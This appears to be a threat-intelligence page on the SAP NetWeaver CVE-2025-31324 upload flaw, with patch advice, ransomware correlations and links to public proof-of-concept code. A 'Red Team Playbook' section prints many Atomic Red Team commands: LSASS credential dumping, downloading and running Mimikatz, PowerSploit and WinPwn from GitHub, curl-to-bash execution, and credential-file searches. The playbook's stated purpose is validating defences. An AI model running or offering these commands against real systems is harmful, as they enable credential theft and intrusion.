CVE-2025-31324
Overview
This vulnerability is an authorization bypass in the SAP NetWeaver Visual Composer Metadata Uploader component, allowing unauthenticated users to interact with a critical upload function. The root cause lies in the lack of proper access control on the Metadata Uploader endpoint, which accepts executable binary uploads without verifying the requester's identity or permissions. The affected feature is the Visual Composer development server within SAP NetWeaver version 7.50, specifically the metadata upload functionality.
Vulnerability Description
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Impact
An attacker can upload malicious executable files without any authentication or user interaction, enabling remote code execution on the SAP NetWeaver server. This leads to full system compromise, including unauthorized access to sensitive data, modification of system configurations, and potential disruption of services. The vulnerability has been actively exploited in the wild, resulting in deployment of webshells and advanced persistent threat tools, severely impacting confidentiality, integrity, and availability of affected environments.
Solution
SAP has released security updates addressing this vulnerability in SAP NetWeaver version 7.50, detailed in SAP Security Note 3594142. Administrators should apply the patches as described in the official SAP security patch day documentation available at https://me.sap.com/notes/3594142 and https://url.sap/sapsecuritypatchday. These updates enforce proper authorization checks on the Visual Composer Metadata Uploader endpoint. No specific workarounds are recommended beyond timely application of the vendor-provided patches.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in SAP NetWeaver Visual Composer's Metadata Uploader arises from a lack of proper authorization mechanisms, allowing unauthenticated users to upload executable binaries. This flaw stems from inadequate access controls that fail to verify the identity of the user attempting to perform the upload. As a result, an attacker can exploit this weakness to introduce malicious code into the system. The ability to upload arbitrary executables poses a significant risk, as these files can be designed to execute harmful actions, such as data exfiltration, system compromise, or even complete takeover of the affected environment.
Attack vectors for this vulnerability are straightforward, as they do not require sophisticated techniques. An attacker could leverage automated scripts or tools to interact with the Metadata Uploader interface, bypassing authentication checks entirely. Once the malicious binary is uploaded, it can be executed within the context of the application, potentially leading to privilege escalation or lateral movement within the network. Scenarios may include targeting sensitive data repositories or critical infrastructure components, ultimately allowing the attacker to disrupt operations or manipulate data integrity.
The real-world impact of this vulnerability is profound, particularly for organizations relying on SAP NetWeaver for their business operations. The potential for unauthorized access to sensitive information can lead to severe breaches of confidentiality, resulting in regulatory penalties and reputational damage. Furthermore, the integrity of data could be compromised, leading to erroneous decision-making based on manipulated information. The availability of services may also be threatened, as attackers could deploy denial-of-service tactics or ransomware, crippling business continuity and incurring significant financial losses.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments and penetration testing can help identify weaknesses in the system's configuration and access controls. Employing application firewalls can also provide an additional layer of protection by filtering out unauthorized requests. Furthermore, organizations should enforce strict authentication and authorization protocols, ensuring that only trusted users have the ability to upload files. Monitoring and logging access to critical components of the application can aid in identifying suspicious activities, allowing for timely incident response.
In conclusion, the vulnerability in SAP NetWeaver Visual Composer's Metadata Uploader presents a critical threat that organizations must address proactively. The ease of exploitation combined with the potential for significant operational disruption underscores the importance of robust security measures. By implementing comprehensive detection and mitigation strategies, businesses can safeguard their systems against the risks posed by unauthorized file uploads, thereby protecting their data integrity, confidentiality, and overall operational resilience.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-31324, rising by over one-third, signaling growing exploitation potential despite a concurrent significant reduction in detection activity across our sensors. This divergence suggests adversaries may be refining evasion techniques or shifting operational tactics, complicating defenders’ ability to identify and respond to exploitation attempts. Additionally, the expansion of ransomware group associations to include a new actor underscores the vulnerability’s rising attractiveness as a vector for financially motivated attacks. The presence of multiple publicly available proof-of-concept exploits further lowers the barrier for threat actors to weaponize this vulnerability. Collectively, these developments elevate the threat level, indicating that while observed exploitation events have temporarily declined, the risk of widespread, impactful attacks remains high and may intensify as adversaries adapt. Defenders should interpret this as a signal of evolving threat dynamics rather than diminished risk.
Update 2 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-31324, with telemetry indicating a significant uptick in activity over recent days. This surge coincides with the continued public availability of multiple proof-of-concept exploits, which lowers the technical barrier for adversaries to weaponize the vulnerability. Notably, ransomware groups previously linked to this vulnerability, including akira and ransomhub, remain active, underscoring the persistent interest from financially motivated threat actors. Although the Exploit Prediction Scoring System (EPSS) score remains near maximum, the recent increase in detection frequency signals a heightened operational tempo rather than a static threat environment. This development matters because it reflects an evolving exploitation landscape where opportunistic attackers are increasingly leveraging unauthenticated upload capabilities to deploy malicious binaries, potentially leading to severe impacts on confidentiality, integrity, and availability of SAP NetWeaver environments. Consequently, the overall threat level for CVE-2025-31324 should be considered elevated, with a greater likelihood of targeted ransomware campaigns exploiting this vector in the near term.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sap | Netweaver | 7.50 |
cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (20)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
redrays-io/CVE-2025-31324
CVE-2025-31324, SAP Exploit
|
redrays-io | 24 | 3 | 2025-04-27 | View |
|
antichainalysis/sap-netweaver-0day-CVE-2025-31324
sap netweaver 0day poc by shinyhunters (scattered lapsus$ hunters) affecting all 7.x CVE-2025-31324
|
antichainalysis | 22 | 1 | 2025-08-15 | View |
|
Onapsis/Onapsis_CVE-2025-31324_Scanner_Tools
|
Onapsis | 12 | 3 | 2025-04-27 | View |
|
Onapsis/Onapsis-Mandiant-CVE-2025-31324-Vuln-Compromise-Assessment
CVE-2025-31324 & CVE-2025-42999 vulnerability and compromise assessment tool
|
Onapsis | 9 | 0 | 2025-05-01 | View |
|
NULLTRACE0X/CVE-2025-31324
|
NULLTRACE0X | 8 | 1 | 2025-05-07 | View |
|
ODST-Forge/CVE-2025-31324_PoC
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader
|
ODST-Forge | 6 | 2 | 2025-04-28 | View |
|
rf-peixoto/sap_netweaver_cve-2025-31324-
Research Purposes only
|
rf-peixoto | 5 | 0 | 2025-05-06 | View |
|
abrewer251/CVE-2025-31324_PoC_SAP
Proof-of-Concept for CVE-2025-31324: Unauthenticated upload in SAP NetWeaver Visual Composer Metadata Uploader
|
abrewer251 | 1 | 3 | 2025-04-29 | View |
|
rxerium/CVE-2025-31324
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated a...
|
rxerium | 4 | 0 | 2025-04-25 | View |
|
aristois913/CVE-2025-31324
Proof-of-Concept 0day for SAP NetWeaver created by ShinyHunters
|
aristois913 | 3 | 0 | 2026-01-12 | View |
|
respondiq/jsp-webshell-scanner
🔍 A simple Bash script to detect malicious JSP webshells, including those used in exploits of SAP NetWeaver CVE-2025-313...
|
respondiq | 1 | 1 | 2025-04-30 | View |
|
nullcult/CVE-2025-31324-File-Upload
A totally unauthenticated file-upload endpoint in Visual Composer lets anyone drop arbitrary files (e.g., a JSP web-shel...
|
nullcult | 2 | 0 | 2025-04-30 | View |
|
moften/CVE-2025-31324-NUCLEI
Nuclei template for cve-2025-31324 (SAP)
|
moften | 1 | 0 | 2025-04-28 | View |
|
JonathanStross/CVE-2025-31324
A Python-based security scanner for identifying the CVE-2025-31324 vulnerability in SAP Visual Composer systems, and det...
|
JonathanStross | 1 | 0 | 2025-04-30 | View |
|
nairuzabulhul/nuclei-template-cve-2025-31324-check
sap-netweaver-cve-2025-31324-check
|
nairuzabulhul | 1 | 0 | 2025-05-08 | View |
|
sug4r-wr41th/CVE-2025-31324
SAP NetWeaver Visual Composer Metadata Uploader <= 7.50 CVE-2025-31324 PoC
|
sug4r-wr41th | 0 | 1 | 2025-05-10 | View |
|
harshitvarma05/CVE-2025-31324-Exploits
|
harshitvarma05 | 0 | 0 | 2025-08-20 | View |
|
Alizngnc/SAP-CVE-2025-31324
SAP NetWeaver Unauthenticated Remote Code Execution
|
Alizngnc | 0 | 0 | 2025-04-28 | View |
|
BlueOWL-overlord/Burp_CVE-2025-31324
Python-based Burp Suite extension is designed to detect the presence of CVE-2025-31324
|
BlueOWL-overlord | 0 | 0 | 2025-04-30 | View |
|
moften/CVE-2025-31324
SAP PoC para CVE-2025-31324
|
moften | 0 | 0 | 2025-04-28 | View |
Ransomware Groups 5
Threat Feed
42 eventsSighting activity recorded
Sighting activity recorded
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Ransomware group known to exploit this vulnerability (30 known victims)
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
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Sighting activity recorded
Sighting activity recorded
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Sighting activity recorded
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Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
30%
|
High | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-31324 |
| me.sap.com |
GitHub CVE
|
https://me.sap.com/notes/3594142 |
| url.sap |
GitHub CVE
|
https://url.sap/sapsecuritypatchday |
| onapsis.com |
NVD API
Third Party Advisory
|
https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/ |
| bleepingcomputer.com |
NVD API
Press/Media Coverage
|
https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/ |
| theregister.com |
NVD API
Press/Media Coverage
|
